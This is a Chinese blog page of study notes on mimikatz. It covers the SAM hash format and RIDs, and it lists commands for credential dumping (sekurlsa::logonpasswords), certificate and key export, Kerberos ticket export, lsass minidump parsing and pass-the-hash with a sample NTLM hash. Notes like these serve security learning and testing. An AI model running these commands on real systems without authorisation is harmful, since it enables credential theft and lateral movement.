下载地址

https://github.com/gentilkiwi/mimikatz/
windows:https://download.csdn.net/download/think_ycx/9362975

官方使用教程

http://www.91ri.org/15178.html

windows密码文件的解读

加密方式链接:
https://blog.csdn.net/ytfhjhv/article/details/83513671
存储位置:C:\windows\system32\config\SAM
密码文件存储格式:
Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值
SID和RID的解读:
链接:https://www.secpulse.com/archives/72017.html
SID:安全标示符,是Windows系统用于唯一标识用户或组的可变长度结构
RID:Windows系统账户对应固定的RID
500: ADMINISTRATOR
501: GUEST
502: krbtgt(域环境)
512: Domain Admins(域环境)
513: Domain Users(域环境)
514: Domain Guests(域环境)
515: Domain Computers(域环境)
516: Domain Controllers(域环境)

命令

standard

退出
exit
清屏
cls
将所所有输出记录到文件中
log other.log
log /stop (停止文件记录)
从磁盘上的文件写入切换到Base64输出
base64
kerbreros::list /export
进入目录
cd xxx

privilege

privilege::debug
备注: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061表示所需的特权不是由客户端拥有的(通常您不是管理员)

crypto

提供的程序
crypto::providers
此命令列出系统存储中的逻辑存储
参数:
/systemstore- 可选 -必须使用列表存储系统存储(默认CERT_SYSTEM_STORE_CURRENT_USER),
它可以是一个:
CERT_SYSTEM_STORE_CURRENT_USER 要么 CURRENT_USER
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY 要么 USER_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE 要么 LOCAL_MACHINE
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY 要么 LOCAL_MACHINE_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE 要么 LOCAL_MACHINE_ENTERPRISE
CERT_SYSTEM_STORE_CURRENT_SERVICE 要么 CURRENT_SERVICE
CERT_SYSTEM_STORE_USERS 要么 USERS
CERT_SYSTEM_STORE_SERVICES 要么 SERVICES
crypto::stores /systemstore:local_machine
此命令列出系统上或驱逐到系统上的智能卡/令牌读取器。
crypto::sc
此命令创建由证书颁发机构签名的用于智能卡身份验证的客户端证书
参数:
/caname -证书颁发机构的主题名称(需要签署证书)
/castore- 可选 -包含证书颁发机构的系统存储(默认:CERT_SYSTEM_STORE_LOCAL_MACHINE)
/upn-用户主要名称(UPN)为对象(如:user@lab.local)
/pfx- 可选 -用于保存最终证书的文件名(默认值:无文件,存储在中CERT_SYSTEM_STORE_CURRENT_USER)
crypto::scauth /caname:KiwiAC /upn:user@lab.local /pfx:user.pfx
此命令列出证书及其密钥的属性,它也可以到处证书
参数:
/systemstore- 可选 -必须使用系统存储(默认:CERT_SYSTEM_STORE_CURRENT_USER)
/store- 可选 -必须用于列出/导出证书的存储(默认值:My)-具有以下内容的完整列表crypto::stores
/export- 可选 -导出所有的证书文件(在公共部位DER,在私处PFX的文件-有密码保护:mimikatz)
/silent- 可选 -如果需要用户交互,则中止
/nokey- 可选 -请勿尝试与私钥进行交互
certificates /systemstore:local_machine /store:my /export
备注:
请参阅crypto::stores以获取有效systemstore列表,其输出用于store列表。
不可导出的键(带有KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b))通常可以通过crypto::capi和/或导出crypto::cng
尽管crypto::capi或crypto::cng补丁,你必须在正确的文件系统ACL访问私有密钥
一些智能卡加密提供商可以报告成功的私人出口

此命令按提供程序列出密钥。它也可以导出密钥。
参数:
/provider- 可选 -传统CryptoAPI提供商(默认:MS_ENHANCED_PROV)
/providertype- 可选 -传统CryptoAPI提供者类型(默认值:PROV_RSA_FULL)
/cngprovider- 可选 -的CNG提供商(默认:Microsoft Software Key Storage Provider)
/export- 可选 -将所有密钥导出到PVK文件
/silent- 可选 -如果需要用户交互,则中止
crypto::keys /export

sekurlsa

登录密码
sekurlsa::logonpasswords
pth
参数:
/user -您要模拟的用户名,请记住,管理员不是此知名帐户的唯一名称。
/domain-完全限定的域名-没有域,或者在本地用户/管理员的情况下,请使用计算机或服务器名称,workgroup或其他名称。
/rc4或/ntlm- 可选 -用户密码的RC4密钥/ NTLM哈希。
/aes128- 可选 -从用户密码和域领域派生的AES128密钥。
/aes256- 可选 -从用户密码和域域派生的AES256密钥。
/run- 可选 -要运行的命令行-默认为:cmd具有外壳。
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
备注:
此命令不适用于小型转储(废话);
它需要提升的特权(privilege::debug或SYSTEM帐户),与使用一种官方API的“通行票”不同;
这个新版本的“通过-散列”将RC4 keysKerberos 替换为ntlm散列(和/或替换AES密钥)-它允许Kerberos提供程序询问TGT票证!;
ntlm在XP / 2003 / Vista / 2008和7 / 2008r2 / 8/2012之前,哈希是必需的kb2871997(AES不可用或不可替换);
AES密钥只能在8.1 / 2012r2或7 / 2008r2 / 8/2012上替换为kb2871997,在这种情况下,您可以避免使用ntlm哈希。
tickets
sekurlsa::tickets /export
ekeys
sekurlsa::ekeys
dpapi
sekurlsa::dpapi
minidump
sekurlsa::minidump lsass.dmp
kerberos
sekurlsa::kerberos

lsadump

vault

token

event

ts

process

service

net

misc

library mimilib

driver mimidrv

以上命令官方教程都有,这就不在摘抄了。。。

Mimikatz 使用学习的更多相关文章

  1. [转帖]mimikatz 学习

    mimikatz mimikatz 2.0 vient de sortir en version alpha binaires : https://github.com/gentilkiwi/mimi ...

  2. 如何防御mimikatz致敬Mimikatz攻防杂谈学习笔记

    零.绪论:mimikatz简介 mimikatz是一款出色的内网渗透工具,可以抓取windows主机的明文密码.NTLMhash值或者kerberos对应的缓存凭据.mimikatz的使用在获取权限后 ...

  3. 23.通过MS17_010来学习msf对渗透的利用

    Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段.本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit. 漏洞环境: 靶机:wi ...

  4. [转帖][思路/技术]Mimikatz的多种攻击方式以及防御方式

    [思路/技术]Mimikatz的多种攻击方式以及防御方式 https://bbs.ichunqiu.com/thread-53954-1-1.html 之前学习过 抄密码 没想到还有这么多功能.   ...

  5. Cobalt Strike学习笔记

    Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java ...

  6. msf学习笔记

    metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP ...

  7. 黑盒渗透测试【转自HACK学习-FoxRoot】

    因 搜到一篇写渗透测试步骤比较详细的文章,转过来学习,方便时常看看. 内容如下: 一.信息搜集 主动/被动搜集 信息搜集分为主动信息搜集和被动信息搜集. 主动信息搜集就是通过直接访问和扫描信息的方式进 ...

  8. 从直播编程到直播教育:LiveEdu.tv开启多元化的在线学习直播时代

    2015年9月,一个叫Livecoding.tv的网站在互联网上引起了编程界的注意.缘于Pingwest品玩的一位编辑在上网时无意中发现了这个网站,并写了一篇文章<一个比直播睡觉更奇怪的网站:直 ...

  9. Angular2学习笔记(1)

    Angular2学习笔记(1) 1. 写在前面 之前基于Electron写过一个Markdown编辑器.就其功能而言,主要功能已经实现,一些小的不影响使用的功能由于时间关系还没有完成:但就代码而言,之 ...

随机推荐

  1. 小白学Python(14)——pyecharts 绘制K线图 Kline/Candlestick

    Kline-基本示例 from pyecharts import options as opts from pyecharts.charts import Kline data = [ [2320.2 ...

  2. 2019 Multi-University Training Contest 7 - 1006 - Snowy Smile - 线段树

    http://acm.hdu.edu.cn/showproblem.php?pid=6638 偷学一波潘哥的二维离散化和线段树维护最大子段和. 思路是枚举上下边界,但是不需要从左到右用最大子段和dp. ...

  3. Neo4j 修改关系类型 type

    没有直接修改的函数,也不需要,下面代码就可以: MATCH (n:User {name:"foo"})-[r:REL]->(m:User {name:"bar&qu ...

  4. 处理键盘事件 禁止后退键(Backspace)密码或单行、多行文本框除外

    //处理键盘事件 禁止后退键(Backspace)密码或单行.多行文本框除外 function forbidBackSpace(e) { var ev = e || window.event; //获 ...

  5. 一个完整的HTTP请求过程详细

    整个流程1.域名解析 —> 2.与服务器建立连接 —> 3.发起HTTP请求 —>4. 服务器响应HTTP请求,浏览器得到html代码 —> 5.浏览器解析html代码,并请求 ...

  6. 提升JAVA代码的好“味道”

    让代码性能更高 需要 Map 的主键和取值时,应该迭代 entrySet() 当循环中只需要 Map 的主键时,迭代 keySet() 是正确的.但是,当需要主键和取值时,迭代 entrySet() ...

  7. mybatis的if标签判断子类属性-There is no getter for property named 'export' in

    1 <select id="findList" resultType="BndExport"> SELECT <include refid=& ...

  8. weblogic+idea

    1.首先是weblogic的安装,去官网下载,下载完成后,安装,然后还需要创建域,参考链接: https://www.cnblogs.com/xdp-gacl/p/4140683.html,创建域的h ...

  9. linux安装 rsync 客户端和相关权限认证

    [root@rsync-client-inotify /]# yum install rsync -y [root@rsync-client-inotify /]# echo "redhat ...

  10. 02scikit-learn模型训练

    模型训练 In [6]: import numpy as np import matplotlib.pyplot as plt from sklearn.linear_model import Lin ...